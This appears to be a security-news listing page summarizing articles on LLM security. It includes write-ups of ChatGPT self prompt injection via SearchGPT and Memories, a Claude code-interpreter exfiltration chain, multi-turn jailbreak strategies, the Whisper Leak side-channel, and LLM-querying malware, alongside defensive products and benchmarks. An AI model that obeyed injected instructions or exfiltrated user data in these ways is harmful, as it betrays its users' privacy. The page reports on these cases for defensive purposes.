<ciso brief />

All news with the #llm security tag

250 articles · page 10 of 13

Researchers Trick ChatGPT into Self Prompt Injection

🔒 Researchers at Tenable identified seven techniques that can coerce ChatGPT into disclosing private chat history by abusing built-in features like web browsing and long-term Memories. They show how OpenAI’s browsing pipeline routes pages through a weaker intermediary model, SearchGPT, which can be prompt-injected and then used to seed malicious instructions back into ChatGPT. Proof-of-concepts include exfiltration via Bing-tracked URLs, Markdown image loading, and a rendering quirk, and Tenable says some issues remain despite reported fixes.
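One defensive idea suggested by the Markdown image exfiltration path is to filter image links out of model output before it is rendered. The sketch below is illustrative only and is not OpenAI's or Tenable's fix: the allowlist `ALLOWED_IMAGE_HOSTS`, the host `example.com`, and the function name `strip_untrusted_images` are all hypothetical, and the regular expression covers only the common inline `![alt](url)` form.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that may serve images in rendered output.
ALLOWED_IMAGE_HOSTS = {"example.com"}

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str, allowed=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace Markdown images whose host is not allowlisted with a placeholder.

    Relative URLs have no host and are removed as well (a conservative choice).
    """

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in allowed:
            return match.group(0)  # keep trusted images untouched
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    reply = "Done. ![x](https://evil.test/pixel.png?d=chat-history)"
    print(strip_untrusted_images(reply))
```

A filter like this only addresses the image-loading channel; the tracked-URL and rendering-quirk channels described in the summary would need separate handling.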

Microsoft Reveals Whisper Leak: Streaming LLM Side-Channel

🔒 Microsoft has disclosed a novel side-channel called Whisper Leak that can let a passive observer infer the topic of conversations with streaming language models by analyzing encrypted packet sizes and timings. Researchers at Microsoft (Bar Or, McDonald and the Defender team) demonstrate classifiers that distinguish targeted topics from background traffic with high accuracy across vendors including OpenAI, Mistral and xAI. Providers have deployed mitigations such as random-length response padding; Microsoft recommends avoiding sensitive topics on untrusted networks, using VPNs, or preferring non-streaming models and providers that implemented fixes.
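The random-length padding mitigation can be pictured with a short sketch. This is a minimal illustration under stated assumptions, not any provider's actual wire format: the JSON field names `delta` and `p`, the `max_pad` parameter, and both function names are hypothetical. The idea is that each streamed chunk carries a filler field of random length, so the size of the encrypted packet no longer tracks the size of the token it contains.

```python
import json
import secrets
import string


def pad_chunk(text: str, max_pad: int = 32) -> str:
    """Serialize a streamed chunk with a random-length filler field."""
    pad_len = secrets.randbelow(max_pad + 1)  # uniform in 0..max_pad
    filler = "".join(secrets.choice(string.ascii_letters) for _ in range(pad_len))
    return json.dumps({"delta": text, "p": filler})


def unpad_chunk(payload: str) -> str:
    """Recover the original chunk text; the filler is simply ignored."""
    return json.loads(payload)["delta"]


if __name__ == "__main__":
    for token in ["The", " quick", " fox"]:
        wire = pad_chunk(token)
        # Payload length varies from run to run even for identical tokens.
        print(len(wire), repr(unpad_chunk(wire)))
```

Padding of this kind hides chunk sizes but not inter-packet timing, which the summary also names as a signal.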

Whisper Leak: Side-Channel Attack on Remote LLM Services

🔍 Microsoft researchers disclosed "Whisper Leak", a new side-channel that can infer conversation topics from encrypted, streamed language model responses by analyzing packet sizes and timings. The study demonstrates high classifier accuracy on a proof-of-concept sensitive topic and shows risk increases with more training data or repeated interactions. Industry partners including OpenAI, Mistral, Microsoft Azure, and xAI implemented streaming obfuscation mitigations that Microsoft validated as substantially reducing practical risk.

Remember, Remember: AI Agents, Threat Intel, and Phishing

🔔 This edition of the Threat Source newsletter opens with Bonfire Night and the 1605 Gunpowder Plot as a narrative hook, tracing how Guy Fawkes' image became a symbol of protest and hacktivism. It spotlights Cisco Talos research, including a new Incident Response report and a notable internal phishing case where compromised O365 accounts abused inbox rules to hide malicious activity. The newsletter also features a Tool Talk demonstrating a proof-of-concept that equips autonomous AI agents with real-time threat intelligence via LangChain, OpenAI, and the Cisco Umbrella API to improve domain trust decisions.

Multi-Turn Adversarial Attacks Expose LLM Weaknesses

🔍 Cisco AI Defense's report shows open-weight large language models remain vulnerable to adaptive, multi-turn adversarial attacks even when single-turn defenses appear effective. Using over 1,000 prompts per model and analyzing 499 simulated conversations of 5–10 exchanges, researchers found iterative strategies such as Crescendo, Role-Play and Refusal Reframe drove failure rates above 90% in many cases. The study warns that traditional safety filters are insufficient and recommends strict system prompts, model-agnostic runtime guardrails and continuous red-teaming to mitigate risk.

AI-Powered Malware Emerges: Google Details New Threats

🛡️ Google Threat Intelligence Group (GTIG) reports that cybercriminals are actively integrating large language models into malware campaigns, moving beyond mere tooling to generate, obfuscate, and adapt malicious code. GTIG documents new families — including PROMPTSTEAL, PROMPTFLUX, FRUITSHELL, and PROMPTLOCK — that query commercial APIs to produce or rewrite payloads and evade detection. Researchers also note attackers use social‑engineering prompts to trick LLMs into revealing sensitive guidance and that underground marketplaces increasingly offer AI-enabled “malware-as-a-service,” lowering the bar for less skilled threat actors.

Google Warns: AI-Enabled Malware Actively Deployed

⚠️ Google’s Threat Intelligence Group has identified a new class of AI-enabled malware that leverages large language models at runtime to generate and obfuscate malicious code. Notable families include PromptFlux, which uses the Gemini API to rewrite its VBScript dropper for persistence and lateral spread, and PromptSteal, a Python data miner that queries Qwen2.5-Coder-32B-Instruct to create on-demand Windows commands. GTIG observed PromptSteal used by APT28 in Ukraine, while other examples such as PromptLock, FruitShell and QuietVault demonstrate varied AI-driven capabilities. Google warns this "just-in-time AI" approach could accelerate malware sophistication and democratize cybercrime.

Google: LLMs Employed Operationally in Malware Attacks

🤖 Google’s Threat Intelligence Group (GTIG) reports attackers are using “just‑in‑time” AI—LLMs queried during execution—to generate and obfuscate malicious code. Researchers identified two families, PROMPTSTEAL and PROMPTFLUX, which query Hugging Face and Gemini APIs to craft commands, rewrite source code, and evade detection. GTIG also documents social‑engineering prompts that trick models into revealing red‑teaming or exploit details, and warns the underground market for AI‑enabled crime is maturing. Google says it has disabled related accounts and applied protections.

Google: New AI-Powered Malware Families Deployed

⚠️ Google's Threat Intelligence Group reports a surge in malware that integrates large language models to enable dynamic, mid-execution changes, which Google calls "just-in-time" self-modification. Notable examples include the experimental PromptFlux VBScript dropper and the PromptSteal data miner, plus operational threats like FruitShell and QuietVault. Google disabled abused Gemini accounts, removed assets, and is hardening model safeguards while collaborating with law enforcement.

Lack of AI Training Becoming a Major Security Risk

⚠️ A majority of German employees already use AI at work, with 62% reporting daily use of generative tools such as ChatGPT. Adoption has been largely grassroots—31% began using AI independently and nearly half learned via videos or informal study. Although 85% deem training on AI and data protection essential, 25% report no security training and 47% received only informal guidance, leaving clear operational and data risks.

SesameOp Backdoor Abuses OpenAI Assistants API for C2

🛡️ Researchers at Microsoft disclosed a previously undocumented backdoor, dubbed SesameOp, that abuses the OpenAI Assistants API to relay commands and exfiltrate results. The attack chain uses .NET AppDomainManager injection to load obfuscated libraries (loader "Netapi64.dll") into developer tools and relies on a hard-coded API key to pull payloads from assistant descriptions. Because traffic goes to api.openai.com, the campaign evaded traditional C2 detection. Microsoft Defender detections and account key revocation were used to disrupt the operation.

AI Summarization Optimization Reshapes Meeting Records

📝 AI notetakers are increasingly treated as authoritative meeting participants, and attendees are adapting speech to influence what appears in summaries. This practice—called AI summarization optimization (AISO)—uses cue phrases, repetition, timing, and formulaic framing to steer models toward including selected facts or action items. The essay outlines evidence of model vulnerability and recommends social, organizational, and technical defenses to preserve trustworthy records.

OpenAI Unveils Aardvark: GPT-5 Agent for Code Security

🔍 OpenAI has introduced Aardvark, an agentic security researcher powered by GPT-5 that autonomously scans source code repositories to identify vulnerabilities, assess exploitability, and propose targeted patches that can be reviewed by humans. Embedded in development pipelines, the agent monitors commits and incoming changes continuously, prioritizes threats by severity and likely impact, and attempts controlled exploit verification in sandboxed environments. Using OpenAI Codex for patch generation, Aardvark is in private beta and has already contributed to the discovery of multiple CVEs in open-source projects.

Claude code interpreter flaw allows stealthy data theft

🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The exploit abuses the default “Package managers only” network setting by leveraging access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.

Five Generative AI Security Threats and Defensive Steps

🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.

Open-Source b3 Benchmark Boosts LLM Security Testing

🛡️ The UK AI Security Institute (AISI), Check Point and Lakera have launched b3, an open-source benchmark to assess and strengthen the security of backbone LLMs that power AI agents. b3 focuses on the specific LLM calls within agent workflows where malicious inputs can trigger harmful outputs, using 10 representative "threat snapshots" combined with a dataset of 19,433 adversarial attacks from Lakera’s Gandalf initiative. The benchmark surfaces vulnerabilities such as system prompt exfiltration, phishing link insertion, malicious code injection, denial-of-service and unauthorized tool calls, making LLM security more measurable, reproducible and comparable across models and applications.

Check Point's AI Cloud Protect with NVIDIA BlueField

🔒 Check Point has made AI Cloud Protect powered by NVIDIA BlueField available for enterprise deployment, offering DPU-accelerated security for cloud AI workloads. The solution aims to inspect and protect GenAI traffic and prompts to reduce data exposure risks while integrating with existing cloud environments. It targets prompt manipulation and infrastructure attacks at scale and is positioned for organizations building AI factories.

Manipulating Meeting Notetakers: AI Summarization Risks

📝 In many organizations the most consequential meeting attendee is the AI notetaker, whose summaries often become the authoritative meeting record. Participants can tailor their speech—using cue phrases, repetition, timing, and formulaic phrasing—to increase the chance their points appear in summaries, a behavior the author calls AI summarization optimization (AISO). These tactics mirror SEO-style optimization and exploit model tendencies to overweight early or summary-style content. Without governance and technical safeguards, summaries may misrepresent debate and confer an invisible advantage to those who game the system.

ChatGPT Atlas Signals Shift Toward AI Operating Systems

🤖 ChatGPT Atlas previews a future where AI becomes the primary interface for computing, letting users describe outcomes while the system orchestrates apps, data, and web services. Atlas demonstrates a context-aware assistant that understands a user’s digital life and can act on their behalf. This prototype points to productivity and accessibility gains, but it also creates new security, privacy, and governance challenges organizations must prepare for.

Model Armor and Apigee: Protecting Generative AI Apps

🔒 Google Cloud’s Model Armor integrates with Apigee to screen prompts, responses, and agent interactions, helping organizations mitigate prompt injection, jailbreaks, sensitive data exposure, malicious links, and harmful content. The model‑agnostic, cloud‑agnostic service supports REST APIs and inline integrations with Apigee, Vertex AI, Agentspace, and network service extensions. The article provides step‑by‑step setup: enable the API, create templates, assign service account roles, add SanitizeUserPrompt and SanitizeModelResponse policies to Apigee proxies, and review findings in the AI Protection dashboard.